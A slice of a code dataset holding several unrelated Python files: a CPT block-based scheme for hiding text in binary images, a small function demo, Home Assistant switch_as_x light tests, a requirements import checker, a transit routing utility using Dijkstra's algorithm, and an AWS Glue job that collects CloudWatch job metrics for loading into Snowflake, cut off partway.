= f_matrix[y * ele:y * ele + ele, x * ele: x * ele + ele]\n r = 8\n f = self.encode(f, k, w, bit)\n f_matrix[y * ele:y * ele + ele, x * ele: x * ele + ele] = np.matrix(f)\n f = f_matrix[y * ele:y * ele + ele, x * ele: x * ele + ele]\n x += 1\n\n if (x * ele + ele > max_size_h):\n y += 1\n x = 0\n\n if (y * ele + ele > max_size_v):\n break\n return self.convertBinaryMatrixToBinaryImage(f_matrix)\n\n def runDecode(self, pathImg):\n f_matrix = self.convertImageToBinaryMatrix(pathImg)\n x = 0\n y = 0\n i = 0\n ele = 16\n max_size_h = f_matrix.shape[1]\n max_size_v = f_matrix.shape[0]\n result = \"\"\n while 1==1:\n r = 8\n f = f_matrix[y * ele:y * ele + ele, x * ele: x * ele + ele]\n dc = self.decode(f, k, w, r)\n num = int(dc, 2)\n result += chr(num)\n x += 1\n if (x * ele + ele > max_size_h):\n y += 1\n x = 0\n\n if y * ele + ele > max_size_v:\n break\n\n if codeToEndDecode in result:\n result = result[:-len(codeToEndDecode)]\n break\n\n return result\n\n def calcPSNR(self, img1, img2):\n\n original = cv2.imread(img1)\n compressed = cv2.imread(img2)\n\n mse = np.mean((original - compressed) ** 2)\n\n if (mse == 0): # MSE is zero means no noise is present in the signal .\n # Therefore PSNR have no importance.\n return 100\n\n max_pixel = 255\n psnr = 20 * math.log10(max_pixel / math.sqrt(mse))\n return psnr\n\n\nk = np.matrix([[1, 1, 0, 1, 1, 1, 0, 1, 0, 1, 1, 0, 1, 1, 1, 1], #1\n [1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0], #2\n [0, 0, 1, 0, 0, 1, 0, 1, 0, 1, 1, 0, 1, 0, 1, 1], #3\n [1, 0, 1, 0, 0, 0, 1, 1, 0, 1, 0, 1, 1, 1, 0, 0], #4\n [1, 0, 0, 0, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 0], #5\n [0, 1, 0, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 0, 0, 1], #6\n [1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0], #7\n [1, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0], #8\n [0, 1, 1, 0, 0, 1, 0, 1, 1, 1, 0, 0, 1, 0, 1, 1], #9\n [1, 1, 0, 1, 0, 0, 0, 0, 1, 0, 1, 1, 0, 1, 1, 0], #10\n [0, 0, 1, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0, 1, 1, 1], #11\n [0, 1, 0, 0, 1, 1, 1, 0, 1, 0, 1, 1, 1, 1, 1, 1], #12\n [1, 0, 1, 0, 0, 1, 0, 0, 1, 1, 1, 1, 0, 1, 0, 1], #13\n [1, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1], #14\n [1, 0, 0, 0, 1, 1, 0, 1, 0, 1, 1, 0, 0, 0, 1, 1], #15\n [1, 0, 0, 0, 1, 0, 1, 0, 1, 1, 1, 0, 1, 0, 0, 0]]) #16\n\nw = [[208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223], #1\n [8, 1, 2, 3, 4, 5, 6, 7, 1, 9, 10, 11, 12, 13, 14, 15], #2\n [32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47], #3\n [144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159], #4\n [240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255], #5\n [48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63], #6\n [80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95], #7\n [192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207], #8\n [96, 97, 98, 99, 100, 101, 102, 103, 104, 1, 106, 107, 108, 109, 110, 111], #9\n [128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143], #10\n [16, 17, 18, 19, 20, 1, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31], #11\n [160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175], #12\n [64, 65, 66, 67, 68, 69, 70, 71, 72, 1, 74, 75, 76, 77, 78, 79], #13\n [176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191], #14\n [224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239], #15\n [112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 1, 126, 127]] #16\n\ncodeToEndDecode = \"HTW\"\n\n\n#cpt = CPT()\n# img = cpt.runEncode(\"./img/demo.jpg\",\"input.txt\")\n# cpt.convertMatrixToImage(img,\"./output/test.jpg\")\n# text = cpt.runDecode(\"./output/test.jpg\")\n# file = open(\"./output/test.txt\",\"w\")\n# file.write(text)\n# file.close()\n# cpt = Cpt()\n# print(cpt.calcPSNR(\"./test3/1.jpg\", \"./test3_rs/1.bmp\"))\n# print(cpt.calcPSNR(\"./test3/2.jpg\", \"./test3_rs/2.bmp\"))\n# print(cpt.calcPSNR(\"./test3/3.jpg\", \"./test3_rs/3.bmp\"))\n# print(cpt.calcPSNR(\"./test3/4.jpg\", \"./test3_rs/4.bmp\"))\n","sub_path":"venv/Include/CPT.py","file_name":"CPT.py","file_ext":"py","file_size_in_byte":9027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"104060804","text":"import random\n\ndef hello():\n print(\"Hello!\")\n print(\" chengjing!\")\nhello()\nhello()\n\n\ndef hello(name):\n print(\"hello! \"+name)\nhello('chengjing')\n\n\n\ndef getAnswer(answerNumber):\n if answerNumber == 1:\n return 'It\\' is certain'\n elif answerNumber == 2:\n return 'hi'\nr = random.randint(1,9)\nfortune = getAnswer(r)\nprint(fortune)\n\nprint('Hello',end='')\nprint('World')\n","sub_path":"little demos/test6(helloFunc).py","file_name":"test6(helloFunc).py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"126951477","text":"\"\"\"Tests for the Switch as X Light platform.\"\"\"\nimport pytest\n\nfrom homeassistant.components.light import (\n ATTR_COLOR_MODE,\n ATTR_SUPPORTED_COLOR_MODES,\n COLOR_MODE_ONOFF,\n)\nfrom homeassistant.components.switch_as_x import DOMAIN\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.helpers import device_registry as dr, entity_registry as er\nfrom homeassistant.setup import async_setup_component\n\nfrom tests.common import MockConfigEntry\nfrom tests.components.light import common\nfrom tests.components.switch import common as switch_common\n\n\nasync def test_default_state(hass):\n \"\"\"Test light switch default state.\"\"\"\n config_entry = MockConfigEntry(\n data={},\n domain=DOMAIN,\n options={\"entity_id\": \"switch.test\", \"target_domain\": \"light\"},\n title=\"Christmas Tree Lights\",\n )\n config_entry.add_to_hass(hass)\n assert await hass.config_entries.async_setup(config_entry.entry_id)\n await hass.async_block_till_done()\n\n state = hass.states.get(\"light.christmas_tree_lights\")\n assert state is not None\n assert state.state == \"unavailable\"\n assert state.attributes[\"supported_features\"] == 0\n assert state.attributes.get(\"brightness\") is None\n assert state.attributes.get(\"hs_color\") is None\n assert state.attributes.get(\"color_temp\") is None\n assert state.attributes.get(\"white_value\") is None\n assert state.attributes.get(\"effect_list\") is None\n assert state.attributes.get(\"effect\") is None\n assert state.attributes.get(ATTR_SUPPORTED_COLOR_MODES) == [COLOR_MODE_ONOFF]\n assert state.attributes.get(ATTR_COLOR_MODE) is None\n\n\nasync def test_light_service_calls(hass):\n \"\"\"Test service calls to light.\"\"\"\n await async_setup_component(hass, \"switch\", {\"switch\": [{\"platform\": \"demo\"}]})\n config_entry = MockConfigEntry(\n data={},\n domain=DOMAIN,\n options={\"entity_id\": \"switch.decorative_lights\", \"target_domain\": \"light\"},\n title=\"decorative_lights\",\n )\n config_entry.add_to_hass(hass)\n assert await hass.config_entries.async_setup(config_entry.entry_id)\n await hass.async_block_till_done()\n\n assert hass.states.get(\"light.decorative_lights\").state == \"on\"\n\n await common.async_toggle(hass, \"light.decorative_lights\")\n\n assert hass.states.get(\"switch.decorative_lights\").state == \"off\"\n assert hass.states.get(\"light.decorative_lights\").state == \"off\"\n\n await common.async_turn_on(hass, \"light.decorative_lights\")\n\n assert hass.states.get(\"switch.decorative_lights\").state == \"on\"\n assert hass.states.get(\"light.decorative_lights\").state == \"on\"\n assert (\n hass.states.get(\"light.decorative_lights\").attributes.get(ATTR_COLOR_MODE)\n == COLOR_MODE_ONOFF\n )\n\n await common.async_turn_off(hass, \"light.decorative_lights\")\n await hass.async_block_till_done()\n\n assert hass.states.get(\"switch.decorative_lights\").state == \"off\"\n assert hass.states.get(\"light.decorative_lights\").state == \"off\"\n\n\nasync def test_switch_service_calls(hass):\n \"\"\"Test service calls to switch.\"\"\"\n await async_setup_component(hass, \"switch\", {\"switch\": [{\"platform\": \"demo\"}]})\n config_entry = MockConfigEntry(\n data={},\n domain=DOMAIN,\n options={\"entity_id\": \"switch.decorative_lights\", \"target_domain\": \"light\"},\n title=\"decorative_lights\",\n )\n config_entry.add_to_hass(hass)\n assert await hass.config_entries.async_setup(config_entry.entry_id)\n await hass.async_block_till_done()\n\n assert hass.states.get(\"light.decorative_lights\").state == \"on\"\n\n await switch_common.async_turn_off(hass, \"switch.decorative_lights\")\n await hass.async_block_till_done()\n\n assert hass.states.get(\"switch.decorative_lights\").state == \"off\"\n assert hass.states.get(\"light.decorative_lights\").state == \"off\"\n\n await switch_common.async_turn_on(hass, \"switch.decorative_lights\")\n await hass.async_block_till_done()\n\n assert hass.states.get(\"switch.decorative_lights\").state == \"on\"\n assert hass.states.get(\"light.decorative_lights\").state == \"on\"\n\n\n@pytest.mark.parametrize(\"target_domain\", (\"light\",))\nasync def test_config_entry_entity_id(hass: HomeAssistant, target_domain):\n \"\"\"Test light switch setup from config entry with entity id.\"\"\"\n config_entry = MockConfigEntry(\n data={},\n domain=DOMAIN,\n options={\"entity_id\": \"switch.abc\", \"target_domain\": target_domain},\n title=\"ABC\",\n )\n\n config_entry.add_to_hass(hass)\n\n assert await hass.config_entries.async_setup(config_entry.entry_id)\n await hass.async_block_till_done()\n\n assert DOMAIN in hass.config.components\n\n state = hass.states.get(f\"{target_domain}.abc\")\n assert state.state == \"unavailable\"\n # Name copied from config entry title\n assert state.name == \"ABC\"\n\n # Check the light is added to the entity registry\n registry = er.async_get(hass)\n entity_entry = registry.async_get(f\"{target_domain}.abc\")\n assert entity_entry.unique_id == config_entry.entry_id\n\n\n@pytest.mark.parametrize(\"target_domain\", (\"light\",))\nasync def test_config_entry_uuid(hass: HomeAssistant, target_domain):\n \"\"\"Test light switch setup from config entry with entity registry id.\"\"\"\n registry = er.async_get(hass)\n registry_entry = registry.async_get_or_create(\"switch\", \"test\", \"unique\")\n\n config_entry = MockConfigEntry(\n data={},\n domain=DOMAIN,\n options={\"entity_id\": registry_entry.id, \"target_domain\": target_domain},\n title=\"ABC\",\n )\n\n config_entry.add_to_hass(hass)\n\n assert await hass.config_entries.async_setup(config_entry.entry_id)\n await hass.async_block_till_done()\n\n assert hass.states.get(f\"{target_domain}.abc\")\n\n\n@pytest.mark.parametrize(\"target_domain\", (\"light\",))\nasync def test_device(hass: HomeAssistant, target_domain):\n \"\"\"Test the entity is added to the wrapped entity's device.\"\"\"\n device_registry = dr.async_get(hass)\n entity_registry = er.async_get(hass)\n\n test_config_entry = MockConfigEntry()\n\n device_entry = device_registry.async_get_or_create(\n config_entry_id=test_config_entry.entry_id,\n connections={(dr.CONNECTION_NETWORK_MAC, \"12:34:56:AB:CD:EF\")},\n )\n switch_entity_entry = entity_registry.async_get_or_create(\n \"switch\", \"test\", \"unique\", device_id=device_entry.id\n )\n\n switch_as_x_config_entry = MockConfigEntry(\n data={},\n domain=DOMAIN,\n options={\"entity_id\": switch_entity_entry.id, \"target_domain\": target_domain},\n title=\"ABC\",\n )\n\n switch_as_x_config_entry.add_to_hass(hass)\n\n assert await hass.config_entries.async_setup(switch_as_x_config_entry.entry_id)\n await hass.async_block_till_done()\n\n entity_entry = entity_registry.async_get(f\"{target_domain}.abc\")\n assert entity_entry.device_id == switch_entity_entry.device_id\n","sub_path":"tests/components/switch_as_x/test_light.py","file_name":"test_light.py","file_ext":"py","file_size_in_byte":6867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"290292747","text":"import importlib\n\nreqs = []\nwith open('../requirements.txt') as f:\n reqs = f.read().split('\\n')\n\n\nreqs = [m.split('==')[0] for m in reqs if m]\n\nfor module in reqs:\n try:\n importlib.import_module(module)\n except ModuleNotFoundError as e:\n print('not found:', module)\nprint(reqs)\n","sub_path":"honeybot/lab.py","file_name":"lab.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"155567835","text":"import settings\nimport pandas as pd\nfrom math import radians, sin, cos, asin, sqrt\nimport json\nimport heapq\n\n\ndef Initialize():\n # Load services, stops, routes\n settings.stops = json.loads(open(\"data/stops.json\").read())\n settings.bus_routes = json.loads(open(\"data/bus_routes.json\").read())\n settings.train_routes = json.loads(open(\"data/train_routes.json\").read())\n\n # Load house and bus_stops nodes\n settings.houses_pd = pd.read_excel(\"data/coordinates.xlsx\")\n settings.stops_pd = pd.read_excel(\"data/stops.xlsx\")\n settings.stations_pd = pd.read_csv(\"data/stations.csv\")\n\n # Initialize BusStopCode, Description\n settings.stops_code_map = {stop['BusStopCode']: stop for stop in settings.stops}\n settings.stops_desc_map = {stop[\"Description\"]: stop for stop in settings.stops}\n\n # Initialize the route_map dictionary\n # route_map = { (service, direction, type) : [route] }\n for route in settings.bus_routes:\n key = (route[\"ServiceNo\"], route[\"Direction\"], \"Bus\")\n if key not in settings.routes_map:\n settings.routes_map[key] = []\n settings.routes_map[key] += [route]\n\n for route in settings.train_routes:\n key = (route[\"ServiceName\"], route[\"Direction\"], \"Train\")\n if key not in settings.routes_map:\n settings.routes_map[key] = []\n settings.routes_map[key] += [route]\n\n # Initialize the graph\n # graph = { node : { (adj_node, (service, direction, type)) : distance } }\n for service, route in settings.routes_map.items():\n if service[-1] == \"Bus\":\n key_name = \"BusStopCode\"\n else:\n key_name = \"StationName\"\n for route_index in range(len(route) - 1):\n key = route[route_index][key_name]\n if key not in settings.graph:\n settings.graph[key] = {}\n if None in {route[route_index][\"Distance\"], route[route_index + 1][\"Distance\"]}:\n distance = 0\n else:\n distance = route[route_index + 1][\"Distance\"] - route[route_index][\"Distance\"]\n settings.graph[key][(route[route_index + 1][key_name], service)] = distance\n\n for index, station in settings.stations_pd.iterrows():\n nearest_nodes = nodes_within_dist(station, settings.max_walking_dist)\n for node in nearest_nodes:\n nearest, dist, key_name = node\n settings.graph[station[\"Description\"]][(str(nearest[key_name]), (\"\", 0, \"Walk\"))] = dist\n\n # For the dropdown list\n settings.drop_station = settings.stations_pd[\"Description\"].to_numpy().tolist()\n settings.drop_house = settings.houses_pd[\"blk_no\"].to_numpy().tolist()\n settings.list_options = [\"Shortest Route\", \"Least Transfers\", \"Prefer Bus\", \"Prefer Train\"]\n\n\ndef distNodes(lon1, lat1, lon2, lat2):\n \"\"\"\n Calculate the great circle distance between two points on the earth (specified in decimal degrees)\n \"\"\"\n # convert decimal degrees to radians\n lon1 = radians(lon1)\n lat1 = radians(lat1)\n lon2 = radians(lon2)\n lat2 = radians(lat2)\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a))\n # Radius of earth in kilometers is 6371\n km = 6371 * c\n return km\n\n\ndef nodes_within_dist(loc, radius):\n \"\"\"\n Return all nodes that are in the radius of given location\n \"\"\"\n lat = float(loc['latitude'])\n lon = float(loc['longitude'])\n nodes = []\n for index, stop in settings.stops_pd.iterrows():\n lat2 = float(stop['latitude'])\n lon2 = float(stop['longitude'])\n dist = distNodes(lon, lat, lon2, lat2)\n if radius > dist > 0:\n nodes.append((stop, dist, \"BusStopCode\"))\n for index, station in settings.stations_pd.iterrows():\n lat2 = float(station['latitude'])\n lon2 = float(station['longitude'])\n dist = distNodes(lon, lat, lon2, lat2)\n if radius > dist > 0:\n nodes.append((station, dist, \"Description\"))\n return nodes\n\n\ndef dijkstra(graph, start, end):\n \"\"\"\n Calculates the shortest path between two points\n \"\"\"\n # priority queue to store the paths\n heap = []\n # seen set to prevent checking the same node twice\n seen = set()\n # push the first item into the priority queue. item is a tuple: (cost, distance, path)\n heapq.heappush(heap, (0, 0, [(start, None, 0)]))\n while heap:\n # get the item with the least cost from the queue\n curr_cost, curr_dist, path = heapq.heappop(heap)\n # get the last node of the path\n node, curr_service, _ = path[-1]\n # if path is found, return the path\n if node == end:\n return curr_dist, path\n # if node has been already checked, skip\n if (node, curr_service) in seen:\n continue\n # add node to the seen set\n seen.add((node, curr_service))\n\n # iterate through all adjacent nodes\n for (adjacent, service), dist in graph.get(node, {}).items():\n # construct a new path with the adjacent node\n new_path = list(path)\n new_path.append((adjacent, service, dist))\n\n # calculate the cost of going to the adjacent node\n new_cost = curr_cost\n if curr_service and curr_service[-1] != 'Walk' and curr_service != service:\n new_cost += settings.transfer_cost\n if service[-1] == \"Bus\":\n new_cost += settings.bus_stop_cost + (dist * 10)\n elif service[-1] == \"Train\":\n new_cost += settings.train_stop_cost + (dist * 10)\n else:\n new_cost += (settings.walking_cost + 1) * (dist * 10)\n\n # push the new path into the queue\n heapq.heappush(heap, (new_cost, dist + curr_dist, new_path))","sub_path":"utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":5863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"523497884","text":"import sys\nimport re\nfrom awsglue.transforms import *\nfrom awsglue.utils import getResolvedOptions\nfrom pyspark.context import SparkContext\nfrom awsglue.context import GlueContext\nfrom awsglue.dynamicframe import DynamicFrame\nfrom awsglue.job import Job\nfrom datetime import datetime, timedelta, date\nfrom botocore.exceptions import ClientError\nfrom pyspark.sql.types import *\nimport boto3\nimport json\nimport csv\nimport io\nimport copy\n\n## @params: [JOB_NAME]\nargs = getResolvedOptions(sys.argv, ['JOB_NAME','key_arn','Multiline','WORKFLOW_NAME','WORKFLOW_RUN_ID'])\n\nsc = SparkContext()\nglueContext = GlueContext(sc)\nspark = glueContext.spark_session\njob = Job(glueContext)\njob.init(args['JOB_NAME'], args)\n\n\nregion='us-east-1'\n\ns3_client = boto3.resource('s3', region_name=region)\nclient = boto3.client('cloudwatch', region_name=region)\nglue_client = boto3.client('glue', region_name=region)\ntime = datetime.utcnow().strftime ('%Y-%m-%d-%H-%M-%S')\nrun_date = date.today().strftime(\"%d/%m/%Y\")\n\n\ndef get_req_count(region, metric_name):\n print('start of method')\n response2 = client.get_metric_statistics(\n Namespace=\"Glue\",\n MetricName='CUSTOM_GLUE_1',\n Dimensions=[\n {'Name': 'Type', 'Value': 'count'},\n {\n 'Name': 'xyz',\n 'Value': 'ABC'\n },\n ],\n StartTime = datetime.utcnow() - timedelta(seconds = 60000),\n EndTime = datetime.utcnow(),\n Period=86460,\n Statistics=[\n \"Sum\",\n ]\n )\n\ndef get_worflow_job_list(workflow_name,exclude_job_list):\n workflow_graph=glue_client.get_workflow(Name=workflow_name, IncludeGraph=True)\n workflow_nodes=workflow_graph['Workflow']['Graph']['Nodes']\n print('workflow_nodes', workflow_nodes)\n exclude_job_list=exclude_job_list\n job_list=[]\n for node in workflow_nodes:\n if node['Type'] == 'JOB' and node['Name'] not in exclude_job_list :\n job_list.append(node['Name'])\n else:\n continue\n print('job_list', job_list)\n return job_list\n\ndef get_job_metrics( namespace, metric_name, metric_type, job_run_id, job_name, Statistics_type):\n print(namespace, metric_name, metric_type, job_run_id, job_name, Statistics_type)\n response = client.get_metric_statistics(\n Namespace=namespace,\n MetricName=metric_name,\n Dimensions=[\n {'Name': 'Type', 'Value': metric_type},\n {\n \"Name\": \"JobRunId\",\n \"Value\": job_run_id\n },\n {'Name': 'JobName', 'Value': job_name }\n ],\n StartTime = datetime.utcnow() - timedelta(seconds = 10800),\n EndTime = datetime.utcnow(),\n Period=300,\n Statistics= [Statistics_type]\n )\n data_points = response['Datapoints']\n print('response get_metric_statistics data_points', data_points)\n data_point = data_points[0] if data_points else 'data not available'\n stats = data_point[Statistics_type] if data_points else -1.0\n return stats\n\n\ndef write_cvs_into_s3(bucket, s3_path):\n\n fieldnames = ['Workflow_run_id','Workflow_name','Job_run_id','Job_name','Job_language','Source','Target','Glue_version', 'Worker_type', 'Number_of_workers','Number_of_rows','Number_of_columns','Elapsed_time','bytesRead','recordsRead','cpuSystemLoad','heap_usage','diskSpaceUsed_MB','Execution_timestamp']\n exclude_job_list = ['metrics_collector_glue_Job','fakedata_generator_job','performance_test_adhoc']\n #get all the job names in a list or array from the workflow api\n #get the first and last job name in fthe exclude job list\n #get the job metadata of the jobs\n #iterate on the list of jobs metadat list of jobs\n # call get_job_metrics with all params to get specific metrics\n # write it in csv in s3 bucket\n\n #glue_job_runs = glue_client.get_job_runs(JobName='ParquetLoadJob')\n #print('glue_job_runs', glue_job_runs)\n #print('glue_job_runs')\n job_names = get_worflow_job_list('performanceTestWf', exclude_job_list )\n batch_get_jobs = glue_client.batch_get_jobs(JobNames=job_names)\n print('batch_get_job', batch_get_jobs)\n print('batch_get_job')\n\n metrics_list = []\n # with open('/tmp/file_name', 'w', newline='') as csvFile:\n # w = csv.writer(csvFile, dialect='excel')\n # w.writerow(fieldnames)\n #batch_get_jobs['Jobs']\n namespace = 'Glue'\n metric_type_count = 'count'\n metric_type_gauge = 'gauge'\n #job_run_id = 'ALL'\n #get job runid from workflow runid\n Statistics_type_avg = 'Average'\n Statistics_type_max = 'Max'\n Statistics_type_sum = 'Sum'\n Workflow_run_id = args['WORKFLOW_RUN_ID']\n Workflow_name = args['WORKFLOW_NAME']\n workflowProperties = glue_client.get_workflow_run_properties(\n Name = args['WORKFLOW_NAME'],\n RunId = args['WORKFLOW_RUN_ID']\n )['RunProperties']\n # fieldnames = ['Job_name','Job_language', 'Glue_version', 'Worker_type', 'Number_of_workers','Number_of_rows','Number_of_columns','Elasped_time','Execution_timestamp']\n for job in batch_get_jobs['Jobs']:\n print('JOB details ::', job)\n Job_name = job['Name']\n job_run_id = workflowProperties[Job_name]\n print('job_run_id ::', job_run_id)\n default_arguments = job['DefaultArguments']\n Job_language = default_arguments['--job-language'] if '--job-language' in default_arguments else 'python'\n Glue_version = job['GlueVersion']\n Number_of_workers = job['NumberOfWorkers']\n Worker_type = job['WorkerType']\n Metric_list = ['glue.driver.aggregate.elapsedTime','glue.driver.aggregate.bytesRead','glue.driver.aggregate.recordsRead','glue.driver.system.cpuSystemLoad','glue.driver.jvm.heap.usage','glue.driver.BlockManager.disk.diskSpaceUsed_MB']\n\n job_definition = glue_client.get_job_run(\n JobName=Job_name,\n RunId=job_run_id,\n PredecessorsIncluded=False\n )['JobRun']\n job_execution_time = float(job_definition['ExecutionTime'])\n metric_mappings= {\n 'glue.driver.aggregate.elapsedTime': [Statistics_type_avg,\"count\"],\n 'glue.driver.aggregate.bytesRead' : [Statistics_type_sum,\"count\"],\n 'glue.driver.aggregate.recordsRead': [Statistics_type_sum,\"count\"],\n 'glue.driver.system.cpuSystemLoad': [Statistics_type_avg,\"gauge\"],\n 'glue.driver.jvm.heap.usage': [Statistics_type_avg,\"gauge\"],\n 'glue.driver.BlockManager.disk.diskSpaceUsed_MB': [Statistics_type_avg,\"gauge\"] \n }\n # Elapsed_time = get_job_metrics(namespace,'glue.driver.aggregate.elapsedTime',metric_type_count,job_run_id,Job_name, Statistics_type_avg )\n # bytesRead = get_job_metrics(namespace,'glue.driver.aggregate.bytesRead',metric_type_count,job_run_id,Job_name, Statistics_type_avg )\n # recordsRead = get_job_metrics(namespace,'glue.driver.aggregate.recordsRead',metric_type_count,job_run_id,Job_name, Statistics_type_sum )\n # cpuSystemLoad = get_job_metrics(namespace,'glue.driver.system.cpuSystemLoad',metric_type_gauge,job_run_id,Job_name, Statistics_type_avg )\n # heap_usage = get_job_metrics(namespace,'glue.driver.jvm.heap.usage',metric_type_gauge,job_run_id,Job_name, Statistics_type_avg )\n # diskSpaceUsed_MB = get_job_metrics(namespace,'glue.driver.BlockManager.disk.diskSpaceUsed_MB',metric_type_gauge,job_run_id,Job_name, Statistics_type_avg )\n # get it from the input test json set on workflow\n met = {}\n for a in Metric_list:\n met.__setitem__(a,get_job_metrics(namespace,a,metric_mappings[a][1],job_run_id,Job_name, metric_mappings[a][0] ))\n met.__setitem__(\"job_execution_time\",job_execution_time)\n \n Number_of_rows = int(workflowProperties[\"TestRows\"])\n Number_of_columns = int(workflowProperties[\"TestColumns\"])\n source = workflowProperties[\"TestSource\"]\n target = workflowProperties[\"TestTarget\"]\n\n dict_val = dict()\n dict_val['Workflow_run_id'] = Workflow_run_id\n dict_val['Workflow_name'] = Workflow_name\n dict_val['Job_run_id'] = job_run_id\n dict_val['Job_name'] = Job_name\n dict_val['Job_language'] = Job_language\n dict_val['Source'] = source\n dict_val['Target'] = target\n dict_val['Glue_version'] = Glue_version\n dict_val['Worker_type'] = Worker_type\n dict_val['Number_of_workers'] = Number_of_workers\n dict_val['Number_of_rows'] = Number_of_rows\n dict_val['Number_of_columns'] = Number_of_columns\n dict_val['Execution_timestamp'] = time\n\n\n for metric in met:\n # Metric_value = get_job_metrics(namespace,metric,metric_type_count,job_run_id,Job_name, Statistics_type_avg )\n \n dict_temp = copy.deepcopy(dict_val)\n dict_temp['Metric_name'] = metric\n dict_temp['Metric_value'] = met[metric]\n metrics_list.append(dict_temp)\n\n # dict_val['Elapsed_time'] = Elapsed_time\n # dict_val['bytesRead'] = bytesRead\n # dict_val['recordsRead'] = recordsRead\n # dict_val['cpuSystemLoad'] = cpuSystemLoad\n # dict_val['heap_usage'] = heap_usage\n # dict_val['diskSpaceUsed_MB'] = diskSpaceUsed_MB\n # dict_val['Execution_timestamp'] = time\n\n\n #metrics_list.append(dict_val)\n # row = [\n # Workflow_run_id,\n # Workflow_name,\n # job_run_id,\n # Job_name,\n # Job_language,\n # source,\n # target,\n # Glue_version,\n # Worker_type,\n # Number_of_workers,\n # Number_of_rows,\n # Number_of_columns,\n # Elapsed_time,\n # bytesRead,\n # recordsRead,\n # cpuSystemLoad,\n # heap_usage,\n # diskSpaceUsed_MB,\n # time,\n # ]\n # w.writerow(row)\n # row = []\n # csvFile.close()\n # bucket.upload_file('/tmp/file_name', s3_path)\n print('dictionary test :', metrics_list)\n #sourceDf = sc.parallelize(metrics_list).toDF()\n schema = StructType([ \\\n StructField(\"Workflow_run_id\",StringType(),True), \\\n StructField(\"Workflow_name\",StringType(),True), \\\n StructField(\"Job_run_id\",StringType(),True), \\\n StructField(\"Job_name\",StringType(),True), \\\n StructField(\"Job_language\",StringType(),True), \\\n StructField(\"Source\",StringType(),True), \\\n StructField(\"Target\",StringType(),True), \\\n StructField(\"Glue_version\",StringType(),True), \\\n StructField(\"Number_of_workers\", IntegerType(), True), \\\n StructField(\"Worker_type\",StringType(),True), \\\n StructField(\"Number_of_rows\", IntegerType(), True), \\\n StructField(\"Number_of_columns\", IntegerType(), True), \\\n StructField(\"Metric_name\", StringType(), True), \\\n StructField(\"Execution_timestamp\", StringType(), True), \\\n StructField(\"Metric_value\", DoubleType(), True) \\\n ])\n print('schema', schema)\n df = spark.createDataFrame(data = metrics_list, schema = schema )\n print('dataframe created ')\n df.printSchema()\n print('schema printed')\n df.show(truncate=False)\n\n tableName=\"GLUE_PERFORMANCE_TEST\"\n stageTable = tableName + \"__STAGE\"\n begin_txn = \"BEGIN TRANSACTION;\"\n create_main_table_if_not_exist = \"\"\"create table \"\"\" + tableName +\"\"\" IF NOT EXISTS AS SELECT * FROM \"\"\"+ stageTable + \"\"\" WHERE 1=2 ;\"\"\"\n insert_into_main_table = \"\"\"Insert into \"\"\" + tableName +\"\"\" SELECT * FROM \"\"\"+ stageTable + \"\"\" ;\"\"\"\n truncate_stage = \"TRUNCATE TABLE \"+stageTable + \" ;\"\n commit_work = \"Commit WORK;\"\n\n preactions = begin_txn+create_main_table_if_not_exist\n postactions = insert_into_main_table+truncate_stage+commit_work\n print (preactions)\n print (postactions)\n secret_client = boto3.client(\"secretsmanager\", region_name=\"us-east-1\", endpoint_url=\"https://secretsmanager.us-east-1.amazonaws.com\")\n response = secret_client.get_secret_value(SecretId=args['key_arn'])\n\n print (\"secret generated\")\n new_test = re.sub(\"-*(BEGIN|END) RSA PRIVATE KEY-*\\r\\n\",\"\", response[\"SecretString\"]).replace(\"\\n\",\"\").replace(\"\\r\",\"\")\n snowflake_properties = {\n \"sfUrl\": \"sfceawseast1d01.us-east-1.privatelink.snowflakecomputing.com\",\n \"sfDatabase\": \"CNAS_DEV\",\n \"sfWarehouse\": \"CNAS_DEV_WAREHOUSE\",\n \"pem_private_key\": new_test,\n \"sfUser\": \"CNAS_DEV_SNOWFLAKE_GLUE_USER\",\n \"sfRole\": \"CNAS_DEV_ROLE\",\n \"sfSchema\": \"PUBLIC\",\n \"connectionName\": \"snowflakeConnection\",\n }\n # print (\"Write from DF starts\")\n\n # Sink0.write.format(SNOWFLAKE_SOURCE_NAME).options(**snowflake_properties).option(\"dbtable\", \"\"\"\"+tableName+\"\"\"__STAGE\").option(\"preactions\", 